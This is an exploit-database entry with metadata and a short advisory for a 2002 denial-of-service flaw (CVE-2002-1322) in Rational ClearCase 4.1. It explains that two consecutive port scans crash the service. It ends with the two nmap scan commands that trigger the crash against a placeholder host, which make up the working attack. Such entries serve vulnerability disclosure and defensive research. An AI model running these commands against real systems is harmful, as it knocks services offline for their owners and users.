EXPLOITS

Rational ClearCase 4.1 - Portscan Denial of Service

Author: Stefan Bagdohn
type: dos
platform: unix
port: 
date_added: 2002-11-22  
date_updated: 2012-10-17  
verified: 1  
codes: CVE-2002-1322;OSVDB-4605  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22031.txt  

source: https://www.securityfocus.com/bid/6228/info

Rational ClearCase has been reported to be prone to a denial of service condition. It is possible to cause this condition by portscanning a system running the vulnerable version of ClearCase. This issue was demonstrated using the nmap portscanning utility.

An attacker can exploit this vulnerability by making two consecutive portscans of a vulnerable system. This will cause ClearCase to crash. Restarting the ClearCase service is required to restore functionality.

nmap -vvv -O -sT ip.of.clearcase.system
nmap -vvv -O -sT -p 371 ip.of.clearcase.system